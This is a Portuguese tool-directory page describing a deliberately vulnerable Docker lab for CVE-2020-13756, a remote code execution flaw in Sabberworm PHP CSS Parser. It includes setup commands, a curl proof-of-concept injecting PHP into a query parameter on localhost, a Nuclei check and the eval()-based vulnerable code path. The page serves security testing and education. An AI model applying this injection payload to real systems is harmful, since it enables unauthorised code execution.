Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2020-13756-env — Ambiente de teste vulnerável para CVE-2020-13756 (Sabberworm PHP CSS Parser RCE) | Kitploit
Ferramentas/GitHubGitHub/kre80r/cve-2020-13756-env
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e EducaçãoLabs e Prática
GitHubkre80r/cve-2020-13756-env

CVE-2020-13756-env

Ambiente de teste vulnerável para CVE-2020-13756 (Sabberworm PHP CSS Parser RCE)

Ver Repositório
1há 9 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2020-13756 Ambiente Vulnerável

Ambiente de teste vulnerável para CVE-2020-13756 - Execução remota de código no Sabberworm PHP CSS Parser.

Detalhes da Vulnerabilidade

CampoValor
CVECVE-2020-13756
ProdutoSabberworm PHP CSS Parser
Versões Vulneráveis< 8.3.1
SeveridadeCrítica (CVSS 9.8)
TipoExecução Remota de Código

Início Rápido (Uma Linha)

root@kitploit:~
docker run -d -p 8080:80 $(docker build -q https://github.com/KrE80r/CVE-2020-13756-env.git)

Ou clone e execute:

root@kitploit:~
git clone https://github.com/KrE80r/CVE-2020-13756-env.git && cd CVE-2020-13756-env && docker-compose up -d

Configuração Manual

root@kitploit:~
# Clone repository
git clone https://github.com/KrE80r/CVE-2020-13756-env.git
cd CVE-2020-13756-env

# Build and run
docker build -t sabberworm-vuln .
docker run -d -p 8080:80 sabberworm-vuln

Verificar a Vulnerabilidade

root@kitploit:~
# Test RCE - should print "VULN_TEST" in response
curl "http://localhost:8080/?n=100;printf(%22VULN_TEST%22);"

A saída esperada contém VULN_TEST no início, comprovando a execução de código.

Teste com Nuclei

root@kitploit:~
nuclei -t CVE-2020-13756.yaml -u http://localhost:8080 -debug

Detalhes Técnicos

A vulnerabilidade existe na função getSelectorsBySpecificity(), que passa entrada de usuário não sanitizada para eval():

root@kitploit:~
// Vulnerable code path
$selectors = $doc->getSelectorsBySpecificity('> ' . $_GET['n']);
// When n=100;printf("test"); the eval() executes: eval('> 100;printf("test");')

Referências

  • NVD
  • Fix Commit
  • Full Disclosure
  • PacketStorm

Aviso Legal

Este ambiente é exclusivamente para testes de segurança autorizados. Não use contra sistemas sem permissão.

Autor

KrE80r - Pesquisa de Segurança

Baixar ferramenta